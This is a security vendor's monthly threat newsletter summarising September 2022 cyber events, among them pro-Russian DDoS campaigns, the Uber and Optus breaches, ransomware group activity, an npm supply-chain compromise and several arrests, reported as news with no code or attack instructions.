Home » Security Bloggers Network » Threat Researchers Newsletter – Issue #3

Threat Researchers Newsletter – Issue #3

by Radware Research on October 1, 2022

Threat Researchers Newsletter – Issue #3

Welcome once again to all our new subscribers. We thank you for your support! This newsletter aims to give our followers a summary of the notable cyber events that happen every month. If there is an event that we miss or one you want us to cover on Threat Researchers Live, please reach out via our Telegram chat channel, Radware Research Chat.

We would also like to take this time to announce that Radware will be hosting a webinar, Cyber Warfare, Protecting Applications and the Networks that Deliver them, from a Ukrainian perspective on October 6th. Join Daniel Smith and Eva Abergel from Radware as they talk about lessons learned and how Ukraine is planning ahead for the future of cyber war with Victor Zhora, Deputy Chairman and Chief Digital Transformation Officer for Ukraine’s State Service of Special Communications and Information Protection (SSSCIP). Register now!

Cyber Legions

Pro-Russian DDoS Attacks

At the beginning of September, Japan was hit by a series of DDoS attacks by the pro-Russian hacktivist group, Killnet after the Japanese government protested Moscow’s decision to terminate the agreement on facilitated visits to the islands of Kunashir, Iturup, and the Lesser Kuril ridge. Targets included Japan Credit Breau, Mixi, Niconicodouga, and other government services.

Avast published a report about a pro-Russian hacktivist group, NoName057(16). This group is known to target governments, news agencies, armies, suppliers, telecommunications companies, and financial institutions with DDoS attacks in Ukraine, as well as supporting counties like Estonia, Lithuania, Norway, and Poland. The group uses a botnet named Bobik, distributed via RedLine Stealer.

Suggested Articles:

Hacker Group Supporting Russia Cyber Attacks on Japan Government Sites

Pro-Russian Group Targeting Ukraine Supporters with DDoS Attacks

Pro-Ukrainian Hackers Cause Traffic in Moscow

It was reported by Vice that pro-Ukrainian hacktivists hacked Yandex’s Taxi service and sent dozens of taxis to the Fili district in Moscow, creating a massive traffic jam.

Suggested Articles:

Hackers Create Traffic Jam in Moscow by Ordering Dozens of Taxis at Once Through App

Evolving Landscape

Google TAG reported that some members of UAC-0098 are former Conti threat actors. The group UAC-00998 traditionally delivers an IcedID trojan that is leveraged for manual ransomware attacks. UAC-0098 is now targeting Ukrainian government agencies as well as European humanitarian and non-profit organizations. The group is reportedly aligned with the Russian government-backed attackers and further blurs the line between financially motivated and government-backed operations in Eastern Europe.

Following the Russian mobilization news, Victor Zhora, Deputy Chairman and CDTO of the State Service of Special Communication and Information Protection of Ukraine (SSSCIP), asked via Twitter if new skilled conscripts will join the Russian cyber offensive to escalate cyber aggression to new levels.

Suggested Articles:

Initial Access Broker Repurposing Techniques in Targeted Attacks Against Ukraine

Comment by Victor Zhora

Russian Hacktivist a Front for APT28?

Mandiant is reporting that multiple threat groups are working in support of Russian interests. Admins of XakNet, Infoccentr, and CyberArmyofRussia_reborn reportedly coordinate operations with Russia’s Main Intelligence Directorate (GRU). These groups primarily conduct DDoS attacks and leak stolen data, but these attacks are typically discovered days after ATP28 tool kits are discovered on victims’ networks.

Suggested Articles:

GRU: Rise of the (Telegram) MinIOns

Nation-State

Iran in Geopolitical Hot Seat

OpIran was launched after Mahsa Amini died while in the custody of Iran’s morality police for wearing her hijab too loosely. Authorities claimed she died of natural causes, but others suggest she was murdered. As a result, Iranians protested across the country. In response to the protests, the Iranian government shut down the internet, resulting in a swarm of hacktivists working to restore communication services, DDoS the Iranian government, and expose government violence.

In addition to OpIran, the US Treasury sanctioned 10 IRGC-affiliated actors for their role in ransomware attacks associated with ATP35, aka Charming Kitted, and attributed a series of attacks against Albania to Iran.

Suggested Articles:

OpIran – Anonymous Hits Iranian State Sites, Hacks Over 300 CCTV Cameras

Iranian State Actors Conduct Cyber Operations Against the Government of Albania

Treasury Sanctions IRGC-Affiliated Cyber Actors for Roles in Ransomware Activity

Hungary Eyes Legal DDoS Attacks

Hungarian Communication Association (MKSZ) suggested that it wants to counter IPTV piracy with legal DDoS attacks. The association is setting up a round table discussion with domestic stakeholders to consider launching DDoS attacks against IPTV providers while enjoying protections under the law. The attacks would theoretically be carried out from a designated IP range marked for legal DDoS attacks to degrade illegal IPTV/VoD services.

Suggested Articles:

Hungary Eyes Legal DDOS Attacks to Combat Piracy

Botnets

Chaos Replaces Kaiji

There is a new botnet on the block, and its name is Chaos. Chaos is a multi-purpose malware written in Go. It is built to target both Windows and Linux devices and is considered an evolution of the Kaiji botnet, discovered back in 2020. The botnet can exploit known vulnerabilities, scan targeted systems, automatically move laterally and propagate. Its second-stage payloads include a DDoS and crypto-mining module.

Suggested Articles:

New Chaos Malware Infects Windows, Linux Devices for DDoS Attacks

Gaming

Blizzard Suffers DDoS Attacks

Last month it was Final Fantasy, this month, it was Blizzard games. An unknown threat actor launched a series of DDoS attacks against Blizzard authentication servers. The attack resulted in a three-hour and thirty-minute outage for Call of Duty, World of Warcraft, and Overwatch.

Suggested Articles:

DDOS Attack Takes Major Activision Blizzard Games Offline for Hours

2K Games Help Desk Targeted

The help desk at 2K games was leveraged to target customers with a fake support ticket pushing RedLine Stealer via embedded links. 2K is a subsidiary of Two-take interactive, as well as Rockstar.

Suggested Articles:

2K Games Says Hacked Help Desk Targeted Players with Malware

Rampages

Uber and Rockstar Hacked

Uber and Rockstar were both hacked in September. A British teenager, who has since been arrested, compromised Uber by buying compromised valid credentials from a darknet marketplace and using them to gain access to the network. While the compromise did not result in a data leak, the teenager was able to leak details about the unreleased game Grand Theft Auto 6 by Rockstar. The teenager responsible for the hack has now breached bail twice since his original arrest in December of 2021.

Suggested Articles:

Uber’s Statement

Rockstar’s Statement

Optus Breach: Australia’s Equifax Moment

Optus, Australia’s second-largest telecom provider, was breached, resulting in a threat actor obtaining and selling 11.2 million records on the darknet forum, Breached. The hack resulted from a threat actor scraping data from an unauthenticated API endpoint. Data included customer names, date of birth, phone numbers, email, and driver’s license or passport numbers. Australian Federal Police launched Operation Hurricane due to the breach, and the threat actor has since removed the listing.

Suggested Articles:

Australia’s Equifax Moment

When All Else Fails… Lulz

A couple going by the name TeaPea hacked into the InterContinental Hotels Group (IHG) network. Described as a couple from Vietnam, they could access email, server directories, and Teams. After social engineering an employee and bypassing MFA, the couple failed to deploy a ransomware payload. Instead of giving up, threat actors deleted files as they were pushed out of the network.

Suggested Articles:

IHG Hack: ‘Vindictive’ Couple Deleted Hotel Chain Data for Fun

Ransomware

LockBit Drama

LockBit has had an entertaining month. The group’s spokesman, LockBitSupp, offered $1000 to anyone with a logo tattoo, but it’s still unknown if the threat actor paid up. LockBit also paid a $50,000 bounty to another threat actor who decrypted a locked file. Additionally, a LockBit developer leaked the group’s latest builder leaving many researchers fearing that other opportunists will use the builder for their own campaigns.

Suggested Articles:

LockBit Ransomware Builder Leaked Online by “Angry Developer”

DDoS Attacks Target Threat Actors

Last month LockBit was the target of DDoS attacks after threatening to leak EnTrust’s data. This month, threat actors have launched DDoS attacks against Cobalt Strike servers belonging to former Conti members. Like the LockBit DDoS, the DDoS included messages, but this time with messages to end the war in Ukraine. Several other ransomware groups, such as ALPHV, LV, Hive, Everest, BianLian, Yanluowang, Snatch, Lorenz, Ragnar Locker, and Vice, have all experienced service degradation in September.

Suggested Articles:

Ransomware Gang’s Cobalt Strike Servers DDoSed with Anti-Russia Messages

Multiple Ransomware Data Leak Sites Experience DDoS Attacks, Facing Intermittent Outages and Connectivity Issues

Vice Society Targeting Educational Vertical

Vice Society, a ransomware group that disproportionately targets the education vertical, compromised the Los Angeles Unified School District in September. Vice Society has recently targeted LAUSD, Sierra College, Samuel Ryder Academy, and SOAS University of London.

Suggested Articles:

The Second Largest U.S. School District LAUSD Hit by Ransomware

Back to School

Educational Vertical Under Attack

Seesaw, a popular messaging app used by educational institutions, was hacked right as students returned to the classroom. Seesaw was the victim of a credential-stuffing attack that resulted in a threat actor using the platform to send an inappropriate image to users.

Suggested Articles:

Supply Chain

Npm Packages Compromised, Again

Malicious npm packages were published by the crypto exchange dYdx. These packages are used by at least 44 cryptocurrency projects and contain illicit code that would run info stealers triggered by a preinstall script on a system when compromised.

Suggested Articles:

npm Packages Used by Crypto Exchanges Compromised

Mitigating the Sun, Part 2

The Sun is The Final Boss of the Internet

In September, Twitter lost a critical data center in California due to an extreme heat wave. The heat wave did not impact Twitter’s data centers in Atlanta and Portland, but many said that if another data center would have fallen over, Twitter would have gone offline. This event follows an outage last month when an extreme heat wave in the United Kingdom took down Oracle’s data center.

Suggested Articles:

Extreme California Heat Knocks Key Twitter Data Center Offline

Energy Emergency Locks Thousands Out of Their Thermostats

In Colorado, 22,000 people found themselves locked out of their smart thermostats after an extreme heat wave hit the state. The electric company, Xcel, usually gives users a chance to override such lockouts but did not give users such an option this time. The company, in defense, stated that the impacted users signed up for a program that allows the company to control the thermostat during an energy emergency for a $25 credit each year they are in the program.

Suggested Articles:

Thousands of Xcel Customers Locked Out of Thermostats During ‘Energy Emergency’

Abductions

Cyber Slavery in Cambodia

Cambodian authorities uncovered a forced labor cybercriminal syndicate. Over the 5-day operation, officers discovered more the 130 cyber-enslaved people who were lured from Southeast Asian countries via social media with promises of lucrative careers. Once in the country, victims had their passports confiscated and were forced to run dating and cryptocurrency scams. Traffickers were offered $17,000 per victim.

Suggested Articles:

Cambodian Authorities Crack Down on Cyber Slavery Amid International Pressure

Hacker Kidnapped by Rival Cyber Gang

Foreshadow, a known member of a SIM-swapping threat group was kidnapped, beaten, and allegedly shot by a rival gang. The hacker was held for $200,000 and was rumored to have died from a gunshot wound. Foreshadow is now in federal custody, but the event highlights a growing tied of Violence-as-a-Service in the cyber community.

Suggested Articles:

SIM Swapper Abducted, Beaten, Held for $200k Ransom

Raids and Arrests

WT1SHOP Seized

A popular darknet marketplace, WT1SHOP, was seized by Portuguese authorities. The marketplace had over 100,000 users, 94 sellers, and two admins who offered over 5.85 million records for sale. This marketplace is similar to the one the Uber hacker used to purchase compromised valid credentials.

Suggested Articles:

Website Selling Stolen Login Credentials and Other Personally Identifying Information is Seized

RSOCKS Admin Arrested

In September, we learned that the admin of RSOCKS, a proxy-for-hire botnet, was arrested a month before US authorities raided his service. The admin was detained in May while on vacation in Bulgaria and is currently waiting to be extradited to the United States.

Suggested Articles:

Risky Biz News: US Ransomware Task Force to go After Ransomware Top Dogs

Kaseya Hacker Admits Guilt

I saved the best for last! The Kaseya hacker, Yaroslav Vasinskyi, has pled guilty in US court for his role in the 2021 Kaseya hack. Vasinskyi was from Ukraine and a member of the REvil ransomware group.

Suggested Articles:

Jeff Stone Links to US Court Fillings Related to The Kaseya Hack

Suggested Newsletters

Are you looking for additional resources and news related to the current threat landscape? Check out these security newsletters suggested by our researchers at Radware.